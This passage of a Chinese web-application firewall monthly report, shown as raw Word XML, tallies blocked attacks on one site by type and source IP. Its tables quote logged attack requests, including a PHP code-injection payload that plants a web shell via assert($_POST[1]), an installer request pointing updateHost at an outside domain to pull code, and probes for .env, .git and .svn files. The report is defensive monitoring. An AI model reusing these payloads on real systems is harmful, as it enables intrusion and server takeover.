        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/inc/md5.asp、/config/AspCms_Config.asp、/inc/config.asp、/Inc/md5.asp、/Include/Functionl.asp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>协议违规</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】HTTP请求内容中包含异常字符或参数值有异如参数中包含无效的转义字符(%)，HTTP协议头部Content-Length值是否为数字等，这类都可能是攻击者伪造的HTTP请求。攻击风险等级：低。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/user.php?act=login、/type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss、/Public/Common/Images/logo.png%0D、/console/images/%252E./console.portal、/install/index.php.bak?step=11&amp;insLockfile=a&amp;s_lang=a&amp;install_demo_name=uajem.php&amp;updateHost=http://cdn.52358.xyz/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>目录信息泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】攻击者可利用此漏洞进行目录遍历，从而获取到服务器的目标结构。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/.git、/.svn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:afterLines="1" w:beforeLines="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val=""/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>恶意user-agents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【描述】user_agent是浏览器标识，针对user_agent可以限制一些不友好的搜索引擎的爬虫，也可以限制有人恶意同时访问网站，使得访问量或访问频率达到一定层次，耗尽服务器资源，从而使网站不能正常提供服务。攻击风险等级：高。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:cs="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>【攻击详情】</w:t>
      </w:r>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992"/>
        <w:gridCol w:w="3154"/>
        <w:gridCol w:w="1245"/>
        <w:gridCol w:w="1245"/>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站点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>目的地址 TOP5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</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(www.dingxinsec.com.cn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/、/index.php?s=/admin/index/dologin、/.env、/?c=utils&amp;m=upload&amp;formname=myform&amp;editname=simg&amp;uppath=static/upfile&amp;pn=、/robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>37</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>(www.dingxinsec.com.cn:443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>较上月--，攻击占比--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00B22C0B" w:rsidRDefault="00B22C0B" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc518464542"/>
      <w:bookmarkStart w:id="18" w:name="_Toc531180267"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>源TOP 10分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00E4426F" w:rsidRDefault="00980B78" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="400" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>主要攻击源来自中国北京的IP为110.42.128.90针对(www.dingxinsec.com.cn)发起累计213次以恶意user-agents等类型的Web攻击；亚太地区的IP为103.147.225.26针对(www.dingxinsec.com.cn)发起累计113次以恶意user-agents等类型的Web攻击；立陶宛的IP为89.47.162.98针对(www.dingxinsec.com.cn)发起累计38次以恶意user-agents等类型的Web攻击，以上攻击均被有效阻断。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>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1162"/>
        <w:gridCol w:w="1162"/>
        <w:gridCol w:w="1743"/>
        <w:gridCol w:w="1743"/>
        <w:gridCol w:w="1162"/>
        <w:gridCol w:w="664"/>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攻击源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击源区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击域名及次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击类型 TOP10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>风险等级</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110.42.128.90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>中国北京</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(213)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>103.147.225.26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>亚太地区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(113)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>89.47.162.98</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>立陶宛iv.lt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(38)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
